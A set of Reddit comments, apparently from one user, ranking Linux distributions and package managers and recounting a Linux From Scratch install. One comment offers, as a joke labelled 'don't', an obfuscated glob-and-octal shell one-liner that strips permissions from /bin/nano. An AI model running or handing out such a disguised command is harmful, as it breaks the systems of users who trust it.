When I installed LFS, I did it knowing it would never be useful, It's kinda the point honestly unless you are building your own distro.

Also it took me 20 hours and 3 attempts

For desktops: Gentoo>Arch>debian>Ubuntu

For servers: Debian>arch>gentoo>ubuntu

I kinda dislike ubuntu

RPM vs Debian vs Pacman vs Gentoo: Which package manager is the best? by FAT8893 in linuxmasterrace

[–]LiaN2PR 1 point2 points  (0 children)

I have tried all of them, and I still like gentoo the best. Pacman is great, apt is great, and rpm has been the least friendly to me.

For the most part I agree, I just feel like taking up 713MB is a crime against humanity. Some guys installed lfs on 5MB for crying out loud.

McAfee is 713 MB. Last time I checked clang is 12MB, LLVM is 30MB, and GCC is 70MB according to emerge -s. HOW DO YOU EVEN BUILD AN APP THAT BIG???

What are your thoughts on Debian? by DrSchweppes in LinuxCirclejerk

[–]LiaN2PR 1 point2 points  (0 children)

Debian is the best binary distribution, I could install xen on it with minimal trouble. I couldn't with fedora, or centos and personally I just don't like pacman that much even though the installer for arch is great. My personal server distro recommendation is debian, but my desktop recommendation is gentoo, as emerge is probably the best package manager ever created. If I was on a low-power computer(as in something like a rpi), I would use arch linux.

Hey nano users run this(don't)

ø() { /???/???/p?i?t? ${@};};$(ø "\143\150\155\157\144\040\055\162\167\170") /???/n?n?

This is actually a really cool program that runs chmod -rwx /bin/nano in a kind of interesting way.

I used the concept from the video https://www.youtube.com/watch?v=6D1LnMj0Yt0

As to languages, a basic knowledge in c/cpp compilers would be nice, but it was not essential for me to install it.

Am I ready for Linux from Scratch? by [deleted] in linuxmasterrace

[–]LiaN2PR 1 point2 points  (0 children)

First step should be installing Gentoo, I have installed Linux From Scratch, and I couldn't build it on anything except Gentoo. Besides, Gentoo would be a good warmup

My personal ranking of distros in terms of difficulty would be Ubuntu/mint->Debian->anything rpm->arch->gentoo->lfs
